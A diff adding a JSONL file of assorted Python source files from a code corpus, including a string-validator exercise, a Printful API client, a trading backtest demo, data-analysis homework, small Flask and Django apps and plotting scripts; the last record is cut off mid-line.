diff --git "a/2260.jsonl" "b/2260.jsonl" new file mode 100644--- /dev/null +++ "b/2260.jsonl" @@ -0,0 +1,582 @@ +{"seq_id":"274194981","text":"\"\"\"\nIn the first line, print True if S has any alphanumeric characters. Otherwise, print False.\nIn the second line, print True if S has any alphabetical characters. Otherwise, print False.\nIn the third line, print True if S has any digits. Otherwise, print False.\nIn the fourth line, print True if S has any lowercase characters. Otherwise, print False.\nIn the fifth line, print True if S has any uppercase characters. Otherwise, print False.\nInput : qA2\nOutput :\nTrue\nTrue\nTrue\nTrue\nTrue\n\"\"\"\nif __name__ == '__main__':\n s = input()\n ctrl1 = False\n ctrl2 = False\n ctrl3 = False\n ctrl4 = False\n ctrl5 = False\n for i in s:\n ctrl1 = ctrl1 or (lambda x: x.isalnum())(i)\n ctrl2 = ctrl2 or (lambda x: x.isalpha())(i)\n ctrl3 = ctrl3 or (lambda x: x.isdigit())(i)\n ctrl4 = ctrl4 or (lambda x: x.islower())(i)\n ctrl5 = ctrl5 or (lambda x: x.isupper())(i)\n print(ctrl1, ctrl2, ctrl3, ctrl4, ctrl5, sep=\"\\n\")\n","sub_path":"string-validators.py","file_name":"string-validators.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"488358168","text":"import copy\nimport yaml\nfrom sceptre.cli.helpers import CfnYamlLoader\n\n\ndef _add_cron_triggers(template,expressions):\n if len(expressions) == 0:\n return\n \n resources = template[\"Resources\"]\n codebuild_tags=copy.deepcopy(resources['CodeBuildProject']['Properties']['Tags'])\n return\n\n\n\ndef sceptre_handler(sceptre_user_data) -> str :\n with open(\"templates/codebuild.yaml\") as f_in:\n template_obj= yaml.load(f_in,Loader=CfnYamlLoader)\n\n adv_env_vars = sceptre_user_data.get('AdvancedEnvironmentVariables')\n\n if adv_env_vars:\n new_vars = list()\n\n #ADD NPM authorization\n #This is extra variable not used in CRM team\n #need to grep and check which service is using and what is the use case\n if adv_env_vars.get(\"NPM\",False):\n print(\"\")\n \n #Add artifactory path\n #This is extra variable not used in CRM team\n #need to grep and check which service is using and what is the use case\n if adv_env_vars.get(\"Artifactory\",False):\n print(\"\")\n\n custom_vars=adv_env_vars.get(\"CustomVariables\")\n if custom_vars:\n for name,value in custom_vars.items():\n #need to grep and check which service is using and what is the use case \n if isinstance(value,dict) and \"Value\" in value:\n v_value=value.get(\"Value\")\n v_type=value.get(\"Type\")\n else:\n v_value= value\n v_type = \"PLAINTEXT\"\n\n new_vars.append({\n \"Name\": name,\n \"Type\": v_type,\n \"Value\": v_value \n }\n )\n template_obj[\"Resources\"][\"CodeBuildProject\"][\"Properties\"][\"Environment\"][\"EnvironmentVariables\"] = new_vars\n\n schedules = sceptre_user_data.get(\"ScheduleRuns\") \n if schedules is not None:\n if isinstance(schedules,str):\n schedules=[schedules]\n schedules=sorted(schedules)\n _add_cron_triggers(template_obj,schedules)\n\n\n #Create and Enable Codestar Notification Rule\n CodeStarNotificationRule = sceptre_user_data.get(\"NotificationRule\")\n if CodeStarNotificationRule is not None:\n _add_notification_rule(template_obj,CodeStarNotificationRule)\n\n#what exactly we are using this function\ndef _get_sceptre_connection_manager():\n import inspect\n\n for frame_info in inspect.stack():\n frame=frame_info.frame\n variables=frame.f_locals\n if variables is None or \"self\" not in variables:\n 
continue\n        self_ref = variables['self']\n        if not hasattr(self_ref,\"connection_manager\"):\n            continue\n        connection_manager = getattr(self_ref,\"connection_manager\")\n        # isinstance might not work here\n        object_found = type(connection_manager).__module__.endswith('sceptre.connection_manager') and type(\n            connection_manager).__name__=='ConnectionManager'\n        if not object_found:\n            continue\n        return connection_manager\n    \n    raise RuntimeError(\"Unable to find sceptre connection manager in the stack\")\n\n#Method to add CodeStar Notification to codebuild Template\ndef _add_notification_rule(template,CodeStarNotificationRule):\n    _notification_rule_property=CodeStarNotificationRule\n    if _notification_rule_property.get(\"TopicArn\") is None:\n        return\n    else:\n        _topicArn = str(_notification_rule_property.get(\"TopicArn\"))\n    \n    if _notification_rule_property.get(\"EventTypeIds\") is not None :\n        _eventTypeIds=_notification_rule_property.get(\"EventTypeIds\")\n    else:\n        _eventTypeIds=[\"codebuild-project-build-state-failed\",\"codebuild-project-build-state-succeeded\"]\n    \n    resources=template[\"Resources\"]\n    codebuild_tags=copy.deepcopy(resources['CodeBuildProject']['Properties']['Tags'])\n\n    #what exactly we are using this function for getting stack name\n    connection_manager=_get_sceptre_connection_manager()\n    stack_name=str(connection_manager.stack_name)\n\n    notification_rule_postfix = \"-NotificationRule\"\n\n    safety_margin = 4\n    number_of_char_in_asset_id = 8\n\n    char_available=(64-len(notification_rule_postfix)-number_of_char_in_asset_id-safety_margin)\n\n    resources[\"CodeStarNotificationRule\"]= {\n        \"Type\": \"AWS::CodeStarNotifications::NotificationRule\",\n        \"Properties\": {\n            \"Name\": {\n                \"Fn::Sub\": [stack_name[-char_available:]+notification_rule_postfix,{}]\n            },\n            \"DetailType\": \"FULL\",\n            \"Resource\": {\n                \"Fn::GetAtt\": [\n                    \"CodeBuildProject\",\n                    \"Arn\"\n                ]\n            },\n            \"EventTypeIds\": _eventTypeIds,\n            \"Targets\": [\n                {\n                    \"TargetType\": \"SNS\",\n                    \"TargetAddress\": _topicArn\n                }\n            ],\n            \"Tags\": codebuild_tags\n        }\n    }\n    \n\n","sub_path":"sceptre-project/cloud-nokku-project/templates/resources/codebuild.py","file_name":"codebuild.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"435352429","text":"\"\"\"Printful REST API client/wrapper.\"\"\"\n\n\nfrom .exceptions import PrintfulException, PrintfulApiException\n\nfrom tweetmerch_website.core.secrets import Secrets\nimport requests\nimport json\n\n\nclass PrintfulClient:\n    \"\"\"Printful REST API wrapper.\"\"\"\n\n\n    __API_ENDPOINT = 'https://api.printful.com/'\n    __USER_AGENT = 'Printful API Python Client for TweetMerch'\n\n    __api_key = None\n\n\n    def __init__(self, api_key=Secrets.get('PRINTFUL_API_KEY')):\n        \"\"\"\n        Initializes the Printful REST API client/wrapper with an `api_key`.\n\n        Keyword Arguments:\n        - `api_key`: Printful REST API authorization API key, provided via your\n        Printful store dashboard (optional, defaults to `PRINTFUL_API_KEY`\n        stored in secrets).\n        \"\"\"\n\n\n        self.__api_key = api_key\n\n\n    def __request(self, method, path, data=None, params=None,\n                  verify_in_response={}):\n        \"\"\"\n        Performs authorized request to `path` on top of `__API_ENDPOINT` with\n        any provided data and/or params and returns its response.\n\n        Positional Arguments:\n        - `method`: HTTP request method (i.e. 
`'GET'`, `'POST'`, `'PUT'`).\n        - `path`: Printful REST API endpoint path without a beginning `/`.\n\n        Keyword Arguments:\n        - `data`: `dict` of data to send with request, typically for\n        `'POST'` or `'PUT'` `method`s. (optional, defaults to `None`)\n        - `params`: `dict` of URL parameters to append to the endpoint url.\n        (optional, defaults to `None`)\n        - `verify_in_response`: `set` of tuples in the form\n        `(<key>, <expected type>)` to verify each key exists in the\n        `response` dict and each key's value is of the expected type. If one of\n        them is not in `response` or one's value is not of the expected type,\n        `PrintfulException` will be raised. (optional, defaults to `{}` - an\n        iterable `None`)\n        \"\"\"\n\n\n        endpoint_url = f'{self.__API_ENDPOINT}{path}'\n        response = getattr(requests, method.lower())(\n            endpoint_url,\n            auth=requests.auth.HTTPBasicAuth(self.__api_key, ''),\n            data=json.dumps(data) if data else None,\n            params=params,\n            headers={\n                'User-Agent': self.__USER_AGENT,\n                'Content-Type': 'application/json',\n            },\n        )\n        response_data = json.loads(response.text)\n\n        # Check response for errors.\n        if all(key in response_data for key in ['code', 'result']):\n            # Printful REST API responded with its typical components, `code`\n            # & `result`. If an error occurred, there will be an `error` key\n            # present.\n            if 'error' in response_data:\n                # Printful REST API responded with an error.\n                msg = (f'{response_data[\"code\"]}, '\n                       f'{response_data[\"error\"][\"reason\"]}: '\n                       f'{response_data[\"error\"][\"message\"]}')\n                raise PrintfulApiException(msg)\n        else:\n            # Printful REST API did not respond with its typical components,\n            # `code` & `result`.\n            msg = (f'Invalid response from Printful REST endpoint '\n                   f'`{endpoint_url}`. Response data: {response_data}.')\n            raise PrintfulApiException(msg)\n\n        # Printful REST API responded without errors.\n        result = response_data['result']\n\n        # Verify `verify_in_response` keys exist in `result` dict and each\n        # key's value is of the expected type.\n        for key_to_verify, type_to_verify in verify_in_response:\n            if key_to_verify not in result:\n                msg = (f'Printful REST API `response` did not have '\n                       f'`verify_in_response` key `{key_to_verify}`.')\n                raise PrintfulException(msg)\n            elif not isinstance(result[key_to_verify], type_to_verify):\n                msg = (f'Printful REST API `response`\\'s '\n                       f'`verify_in_response` key `{key_to_verify}`\\'s '\n                       f'expected type was `{type_to_verify}` but '\n                       f'`{key_to_verify}`\\'s type was '\n                       f'`{type(result[key_to_verify])}`.')\n                raise PrintfulException(msg)\n\n        return result\n\n\n    def __get(self, *args, **kwargs):\n        \"\"\"\n        Performs GET request and returns response.\n\n        View `self.__request` method for available positional and keyword\n        arguments.\n        \"\"\"\n\n        return self.__request('GET', *args, **kwargs)\n\n\n    def __post(self, *args, **kwargs):\n        \"\"\"\n        Performs POST request and returns response.\n\n        View `self.__request` method for available positional and keyword\n        arguments.\n        \"\"\"\n\n        return self.__request('POST', *args, **kwargs)\n\n\n    def get_information_about_variant(self, variant_id):\n        \"\"\"\n        Returns information about a specific Variant and its Product.\n\n        Printful Docs: https://www.printful.com/docs/products#actionVariant\n\n        Positional Arguments:\n        - `variant_id`: Printful Variant id.\n        \"\"\"\n\n        path = f'products/variant/{variant_id}'\n        verify_in_response = {('variant', dict), ('product', dict)}\n\n        return self.__get(path, verify_in_response=verify_in_response)\n\n\n    def get_products_variant_list(self, product_id):\n        \"\"\"\n        Returns 
information about a specific Product and a list of Variants of\n the Product.\n\n Printful Docs: https://www.printful.com/docs/products#actionGet\n\n Positional Arguments:\n - `product_id`: Printful Product id.\n \"\"\"\n\n path = f'products/{product_id}'\n verify_in_response = {\n ('variants', list),\n ('product', dict),\n }\n\n return self.__get(path, verify_in_response=verify_in_response)\n\n\n def retrieve_product_variant_printfiles(self, product_id):\n \"\"\"\n Returns list of printfiles available for product variants.\n\n Printful Docs: https://www.printful.com/docs/generator#actionPrintfiles\n\n Positional Arguments:\n - `product_id`: Printful Product id.\n \"\"\"\n\n path = f'mockup-generator/printfiles/{product_id}'\n verify_in_response = {\n ('product_id', int),\n ('available_placements', dict),\n ('product_id', int),\n ('available_placements', dict),\n ('printfiles', list),\n ('variant_printfiles', list),\n }\n\n return self.__get(path, verify_in_response=verify_in_response)\n","sub_path":"printful/core/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"457611584","text":"# Copyright 2016-present CERN – European Organization for Nuclear Research\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom time import time\nfrom typing import List\n\n\nfrom demo_scripts.backtester.moving_average_alpha_model import MovingAverageAlphaModel\nfrom demo_scripts.demo_configuration.demo_ioc import container\nfrom qf_lib.analysis.trade_analysis.trades_generator import TradesGenerator\nfrom qf_lib.backtesting.alpha_model.alpha_model import AlphaModel\nfrom qf_lib.backtesting.strategies.signal_generators import OnBeforeMarketOpenSignalGeneration\nfrom qf_lib.backtesting.strategies.alpha_model_strategy import AlphaModelStrategy\nfrom qf_lib.backtesting.fast_alpha_model_tester.initial_risk_stats import InitialRiskStatsFactory\nfrom qf_lib.backtesting.fast_alpha_model_tester.scenarios_generator import ScenariosGenerator\nfrom qf_lib.backtesting.monitoring.backtest_monitor import BacktestMonitorSettings\nfrom qf_lib.backtesting.position_sizer.initial_risk_position_sizer import InitialRiskPositionSizer\nfrom qf_lib.backtesting.trading_session.backtest_trading_session import BacktestTradingSession\nfrom qf_lib.backtesting.trading_session.backtest_trading_session_builder import BacktestTradingSessionBuilder\nfrom qf_lib.common.enums.frequency import Frequency\nfrom qf_lib.common.tickers.tickers import BloombergTicker\nfrom qf_lib.common.utils.dateutils.string_to_date import str_to_date\n\n\ndef _create_trading_session(init_risk: float):\n start_date = str_to_date('2013-01-01')\n end_date = str_to_date('2016-12-31')\n\n session_builder = container.resolve(BacktestTradingSessionBuilder) # type: BacktestTradingSessionBuilder\n session_builder.set_position_sizer(InitialRiskPositionSizer, initial_risk=init_risk)\n 
session_builder.set_monitor_settings(BacktestMonitorSettings.no_stats())\n session_builder.set_backtest_name(\"Initial Risk Testing - {}\".format(init_risk))\n session_builder.set_frequency(Frequency.DAILY)\n ts = session_builder.build(start_date, end_date)\n return ts\n\n\ndef get_trade_rets_values(ts: BacktestTradingSession, model: AlphaModel) -> List[float]:\n model_tickers_dict = {model: [BloombergTicker('SVXY US Equity')]}\n\n strategy = AlphaModelStrategy(ts, model_tickers_dict, use_stop_losses=True)\n OnBeforeMarketOpenSignalGeneration(strategy)\n ts.use_data_preloading([BloombergTicker('SVXY US Equity')])\n ts.start_trading()\n\n trades_generator = TradesGenerator()\n trades = trades_generator.create_trades_from_backtest_positions(ts.portfolio.closed_positions())\n returns_of_trades = [t.pnl for t in trades]\n return returns_of_trades\n\n\ndef main():\n stats_factory = InitialRiskStatsFactory(max_accepted_dd=0.1, target_return=0.02)\n initial_risks_list = [0.001, 0.005, 0.01, 0.02, 0.03, 0.05, 0.1]\n\n scenarios_generator = ScenariosGenerator()\n scenarios_df_list = []\n\n nr_of_param_sets = len(initial_risks_list)\n test_start_time = time()\n print(\"{} parameters sets to be tested\".format(nr_of_param_sets))\n\n param_set_ctr = 1\n for init_risk in initial_risks_list:\n start_time = time()\n ts = _create_trading_session(init_risk)\n alpha_model = MovingAverageAlphaModel(5, 20, 1.25, ts.data_provider) # Change to a different alpha model to test it\n trade_rets_values = get_trade_rets_values(ts, alpha_model)\n scenarios_df = scenarios_generator.make_scenarios(\n trade_rets_values, scenarios_length=100, num_of_scenarios=10000\n )\n\n end_time = time()\n print(\"{} / {} initial risk parameters tested\".format(param_set_ctr, nr_of_param_sets))\n print(\"iteration time = {:5.2f} minutes\".format((end_time - start_time) / 60))\n param_set_ctr += 1\n\n scenarios_df_list.append(scenarios_df)\n\n print(\"\\nGenerating stats...\")\n start_time = time()\n\n stats = stats_factory.make_stats(initial_risks_list, scenarios_df_list)\n print(stats)\n\n end_time = time()\n print(\"iteration time = {:5.2f} minutes\".format((end_time - start_time) / 60))\n\n test_end_time = time()\n print(\"test duration time = {:5.2f} minutes\".format((test_end_time - test_start_time) / 60))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"demo_scripts/backtester/compare_different_initial_risks.py","file_name":"compare_different_initial_risks.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"217814531","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport os\n\nmaindirectory = \"G:/Sree LightSpot tests/groups/\"\ngroup = str(sys.argv[1])\ndirectory = maindirectory + group + \"/\"\n\ndef CreateCohort(location):\n\tos.chdir(location)\n\tfiles = os.listdir(location)\n\tdataset = None\n\tfor i in files:\n\t\tif dataset is not None:\n\t\t\ttemp = pd.read_csv(i)\n\t\t\ttemp = temp[(temp[\"Minutes\"] > 60) & (temp[\"Minutes\"] < 121)]\n\t\t\tdataset = pd.concat([dataset, temp[\"Shelter Duration\"]], axis=1)\n\t\t\tdel temp\n\t\tif dataset is None:\n\t\t\tdataset = pd.read_csv(i)\n\t\t\tdataset = dataset[(dataset[\"Minutes\"] > 60) & (dataset[\"Minutes\"] < 121)]\n\t\t\tdataset = dataset[\"Shelter Duration\"]\n\treturn dataset\t\n\n\ndef Shelter(cohort):\n\tMinutes = np.array(range(1, 61)).reshape(-1,1)\n\tShelter = np.zeros(60).reshape(-1,1)\n\tdata = 
np.concatenate([Minutes, Shelter], axis=1)\n\tinterval = 1\n\tfor j in range(0, 60):\n\t\tdata[j, 1] = cohort[\"Shelter Duration\"][cohort[\"Minutes\"] == interval].mean()\n\t\tinterval = interval + 1\n\tdata1 = pd.DataFrame(data)\n\tdata1.columns = [\"Minutes\", \"Shelter Duration\"]\n\treturn data1\n\t\ncohortdata = CreateCohort(directory)\ncohortdata.to_csv(directory + group + \"cohortdata.csv\")","sub_path":"darkshelter.py","file_name":"darkshelter.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208819549","text":"# Use simple find and replace to convert the class labels to 1, 2, and 3 in the dataset. \n# iris copy.data\n\n# %% Read the data and report mean and standard deviation for each column in the features (4 features)\nimport numpy as np\nimport pandas as pd\nimport random\n\niris_data = pd.read_csv(\"iris copy.data\", names=[\"x1\" , \"x2\" , \"x3\" , \"x4\" , \"y\"])\n\n# for col in iris_data.columns:\n# print(f\"Mean of {col} = {np.mean(iris_data[col])}\")\n# print(f\"StdDev of {col} = {np.std(iris_data[col])}\")\n\nprint(iris_data.mean())\nprint(iris_data.std())\n\n# %% Report the class distribution (i. e number of instances for each class)\niris_data.groupby([\"y\"]).size() \n\n# %% Show histogram for each feature. Note you need to use a single function/method that \n# outputs the histogram with a given filename. eg. feature1.png which is given as a parameter \n# to the function. A for loop should be used to call the function/method\nh = iris_data.hist()\n\n# %% Split data into a train and test test. Use 60 percent data in the training and test set \n# which is assigned i. randomly ii. assigned by first 60 percent as train and rest as test. \ntrain = iris_data.sample(frac=0.6, random_state=1)\ntest = iris_data.drop(train.index)\n\n# Use previous functions to report the mean and standard deviation of the train and test set \n# and class distribution and also the histograms for each feature. \nprint(train.mean())\nprint(train.std())\ntrain.hist()\n\nprint(test.mean())\nprint(test.std())\ntest.hist()\n\n# Create another subset of the train and test set where only 1 feature selected by the user \n# makes the dataset with the class. \n\n\n# %% Create a subset of the dataset where you consider only instances that feature class 1 or 2, \n# so that you treat this problem as a binary classification problem later, \n# i.e save it as binary_iristrain.txt and binary_iristest.txt. \n# Carry out the stats and visuals in Step 6 for this dataset. \niris_12 = iris_data.loc[(iris_data[\"y\"] == 1) | (iris_data[\"y\"] == 2)]\niris_12.to_csv('iris_12.data', index=False)\n\n\n# %% Can you normalise the input features between [0 and 1] ? 
\n# Write code that can do so and save normalised versions.\niris_norm_12 = iris_12.apply(lambda x: x/x.max(), axis = 0)\niris_norm_12.to_csv('iris_norm_12.data', index=False)\n# %%\n","sub_path":"Week1/iris/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"69217415","text":"import codecs\nimport datetime\nimport urllib.request, urllib.parse, urllib.error\nfrom xml.etree import ElementTree as etree\n\n# Replace the link within the iss_tracker_link variable below with the RSS link related to your locaation.\n# The specific RSS link can be found by going here: https://spotthestation.nasa.gov/sightings\n# Be sure to get the RSS link for your corresponding geography.\n\niss_tracker_link =\"https://spotthestation.nasa.gov/sightings/xml_files/United_States_California_Lakewood.xml\"\n\n# Raw xml dump from the link above.\nread_iss_link = urllib.request.urlopen(iss_tracker_link).read()\n\n# Parses xml from a string directly into an Element, which is the root element of the parsed tree.\niss_root = etree.fromstring(read_iss_link) \nitem = iss_root.findall('channel/item')\n\niss_desc = []\niss_date_tweet_dict = {}\n\n# Constructing the iss_desc[]\n\nfor entry in item:\n\tdesc = entry.findtext('description')\n\tiss_desc.append(desc)\n\nfor entry in iss_desc:\n\n\tentry = entry.replace(\"
\",\"\")\n\tentry = entry.replace(\"\\n\\t\\t\\t\\t\",\"\")\n\tentry = entry.replace(\"Date: \",\"\")\n\n\tloc_maxm = entry.find(\"Maximum\")\n\tloc_time = entry.find(\"Time\")\n\tloc_duration = entry.find(\"Duration\")\n\t\n\ttweet_date = str(datetime.datetime.strptime(entry[:loc_time], \"%A %b %d, %Y \").date())\n\t\n\t# Don't forget to change your @mentions and #hashtags below so to reflect you region and preferences.\n\n\tiss_date_tweet_dict[tweet_date] = \"The Int'l @Space_Station is passing over #LosAngeles on \" + entry[:loc_time] + \"at \"+ entry[loc_time+6:loc_duration] + \"for\" + entry[loc_duration+9:loc_maxm-1] + \". @GriffithObserv\"\n \n\n","sub_path":"iss_tracker_file_gen.py","file_name":"iss_tracker_file_gen.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"481364090","text":"# example of configuration file\ntreeName= 'Events'\n\n\ntag = 'fit_v4.5_2018_VBFdipole'\ndirec = \"conf_fit_v4.5\"\n\n# used by mkShape to define output directory for root files\noutputDir = 'rootFile_'+tag \n\n# file with TTree aliases\naliasesFile = direc+'/aliases.py'\n\n# file with list of variables\nvariablesFile = direc+'/variables.py'\n\n# file with list of cuts\ncutsFile = direc +'/cuts.py' \n\n# file with list of samples\nsamplesFile = direc+'/samples.py' \n#samplesFile = direc+'/samples.py'\n\n#t file with list of samples\nplotFile = direc+'/plot.py' \n\n# luminosity to normalize to (in 1/fb)\nlumi = 59.74\n\n# used by mkPlot to define output directory for plots\n# different from \"outputDir\" to do things more tidy\n#outputDirPlots = 'plot_'+tag +\"_rescaled/detajpt_ext\"\noutputDirPlots = 'plot_'+tag \n\n# used by mkDatacards to define output directory for datacards\n#outputDirDatacard = 'datacards_'+tag \noutputDirDatacard = 'datacards_'+tag +\"_Dipole_v1\"\n\n# structure file for datacard\nstructureFile = direc+'/structure.py'\n\n\n# nuisances file for mkDatacards and for mkShape\nnuisancesFile = direc+'/nuisances.py'\n# nuisancesFile = direc + '/nuisances_datacard.py'\n\n\ncustomizeScript = direc + '/customize.py'","sub_path":"Configurations/VBSjjlnu/Full2018v7/configuration_fit_v4.5_2018_VBFdipole.py","file_name":"configuration_fit_v4.5_2018_VBFdipole.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499494047","text":"from scipy.io.wavfile import read,write\nfrom scipy.signal import stft,istft\nfrom scipy.fft import fft,ifft\nfrom scipy.ndimage import gaussian_filter1d\nimport numpy as np\nimport matplotlib.pyplot as plt\nframerate,audio=read('list1M_01.wav')\nplt.plot(audio)\nplt.show()\ntime_audio=len(audio)/framerate\nmin_time=0.02\nlen_seg=int(min_time*framerate)\nf,t,Zxx=stft(audio,nperseg=len_seg,noverlap=int(len_seg*0.8),window='hamming')\nf*=framerate\nt=np.linspace(0,time_audio,len(t))\n\nnw=np.zeros_like(Zxx)\nfor i in range(5,Zxx.shape[0]):\n\tnw[i]=Zxx[i-3]\nout=(istft(nw,nperseg=len_seg,noverlap=int(len_seg*0.8),window='hamming')[1]).astype('int16')\nplt.plot(out)\nplt.show()\nwrite('out.wav',framerate,out)\n\nimg=plt.pcolormesh(t,f[:50],2*np.log(np.abs(Zxx)+1e-6)[:50],vmin=-5,vmax=15,shading='auto')\nplt.title('Original')\nplt.colorbar(img,label='energy(db)')\nplt.ylabel('Frequency [Hz]')\nplt.xlabel('Time [sec]')\nplt.show()\n\nimg=plt.pcolormesh(t,f[:50],2*np.log(np.abs(nw)+1e-6)[:50],vmin=-5,vmax=15,shading='auto')\nplt.title('Pitch 
shifted')\nplt.colorbar(img,label='energy(db)')\nplt.ylabel('Frequency [Hz]')\nplt.xlabel('Time [sec]')\nplt.show()\n\n","sub_path":"homework1/submit/pitch_shift.py","file_name":"pitch_shift.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"485597800","text":"from django.conf.urls import patterns, url\n\nfrom horsebook.booking.views import (\n    create_booking,\n    participate,\n    student_abort_booking,\n    show_booking,\n    trainer_abort_booking_row,\n    edit_booking\n)\n\nfrom django.views.generic import TemplateView\n\nurlpatterns = patterns(\n    '',\n    url(r'^edit/(?P[0-9]+)', view=edit_booking),\n    url(r'^show_booking/(?P[0-9]+)', view=show_booking),\n    url(r'^student_abort/(?P[0-9]+)', view=student_abort_booking),\n    url(r'^trainer_abort/(?P[0-9]+)', view=trainer_abort_booking_row),\n    url(r'^create$', view=create_booking),\n    url(r'^participate$', view=participate),\n    url(r'^confirm', TemplateView.as_view(template_name=\"booking/confirm.html\")),\n    url(r'^confirm_participate', TemplateView.as_view(template_name=\"booking/confirm_participate.html\")),\n)\n","sub_path":"horsebook/booking/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"220641961","text":"from matplotlib import pyplot as plt\r\n\r\nx = [1,2,3,4,5,6,7,8]\r\ny = [2,4,6,8,4,3,9,8]\r\n\r\nplt.scatter(x, y, label=\"scatter\", color=\"k\", s=100, marker=\"x\") # label, color, size, marker\r\n\r\nplt.xlabel('x')\r\nplt.ylabel('y')\r\n\r\nplt.title('Interesting Graph')\r\nplt.legend()\r\n\r\nplt.show()","sub_path":"python-matplotlib/scatterplot.py","file_name":"scatterplot.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"43637381","text":"import time\nimport simpleaudio as sa\n\n# list with a rhythmic sequence in quarter notes\nnote_seq = [1.5, 1, 1, 0.5]\nbpm = 120\n\n# function to transform a rhythmic sequence into duration in time (sec.)\ndef to_time(src_seq, bpm):\n    dst_seq = []\n    dur_multiplyer = 60.0 / bpm\n\n    # iterate through the source sequence, add duration values to destination seq\n    for note_dur in src_seq:\n        dst_seq.append(note_dur * dur_multiplyer)\n\n    return dst_seq\n\n# call the to_time function and store the resulting sequence\ntime_seq = to_time(note_seq, bpm)\n\nprint(\"Sequence with quarter note values:\", note_seq)\nprint(\"Sequence with duration values in seconds:\", time_seq)\n","sub_path":"csd2a/theorie/3_a_single_sample_drumploop.py","file_name":"3_a_single_sample_drumploop.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"131631301","text":"from flask import Flask\n\napp = Flask(\"NOME\")\n\n@app.route(\"/hello\")\n@app.route(\"/hello/<nome>\")\n@app.route(\"/hello/<nome>/<sobrenome>\")\ndef echo_name(nome = None, sobrenome = None):\n\n    if nome == None :\n        nome = 'Visitante'\n    if sobrenome == None :\n        sobrenome = ' '\n\n    return 'Ola internet: '+nome+' '+sobrenome, 200\n\napp.run(debug=True, use_reloader=True)\n","sub_path":"special-software-topics/2-bim/aula-09/flask/base/flask_app/app_proj2.py","file_name":"app_proj2.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"298819705","text":"import matplotlib.pyplot as plt\nimport 
os\nimport pandas as pd\nimport numpy as np\nfrom tools import chargelib\n\nclass monthly:\n \n def __init__(self, month):\n df = pd.read_csv(month.write_path, index_col=0)\n\n df = df[ df['Category'] != 'payment']\n\n categories = list(chargelib.charges.keys()) \n amounts = dict()\n \n for c in categories:\n amounts[c] = np.round(np.sum(df[df['Category'] == c]['Amount']), decimals=2)\n\n self.amounts = amounts\n \n \n \n def plot(self):\n Type = list(self.amounts.keys())\n Amounts = list(self.amounts.values())\n \n df = pd.DataFrame({'types' : Type , 'amounts' : Amounts})\n gtz = df['amounts'] > 0\n df = df[gtz]\n df = df.sort_values('amounts', ascending=False)\n \n Type = list(df['types'].get_values())\n Amounts = list(df['amounts'].get_values())\n \n # Switch first and second \n _famt = Amounts[0]; _samt = Amounts[1]\n _ftype = Type[0]; _stype = Type[1]\n Amounts[0] = _samt; Amounts[1] = _famt\n Type[0] = _stype; Type[1] = _ftype\n \n for k in [-1 , -2, -3]:\n top = Amounts[-1*k]\n bottom = Amounts[k]\n Amounts[-1*k] = bottom\n Amounts[k] = top\n \n for k in [-1 , -2, -3]:\n top = Type[-1*k]\n bottom = Type[k]\n Type[-1*k] = bottom\n Type[k] = top\n \n \n def make_autopct(values):\n def my_autopct(pct):\n total = sum(values)\n val = pct*total/100.0\n return '${v:.2f} ({p:.2f}%) '.format(p=pct,v=val)\n return my_autopct\n\n fig1, ax1 = plt.subplots(figsize=(12, 12))\n ax1.pie(Amounts, labels=Type, autopct = make_autopct(Amounts),\n shadow=True, startangle=90)\n ax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.\n \n plt.show()\n \n \nclass annual:\n \n def __init__(self, summary_dir):\n self.summary_dir = summary_dir\n self.summary = dict()\n files = os.listdir(summary_dir)\n self.months = ['january' , 'february' , 'march' , 'april', 'may' , 'june', 'july']\n self.Amounts = []\n for m in self.months:\n for f in files: \n if m in f:\n name = summary_dir + f\n df = pd.read_csv(name, index_col=0)\n \n categories = list(chargelib.charges.keys()) \n amounts = dict()\n \n df = df[ df['Category'] != 'payment']\n \n \n \n for c in categories:\n if c != 'payment':\n amounts[c] = np.round(np.sum(df[df['Category'] == c]['Amount']), decimals=2)\n self.Type = list(amounts.keys())\n self.Amounts.append(list(amounts.values()))\n \n# self.summary[m] = {'Category' : Type, 'Amounts' : Amounts}\n\n def plot(self):\n money_matrix = np.array(self.Amounts)\n plt.figure(figsize=(15,10))\n for count , p in enumerate(money_matrix.T):\n \n plt.plot(p, 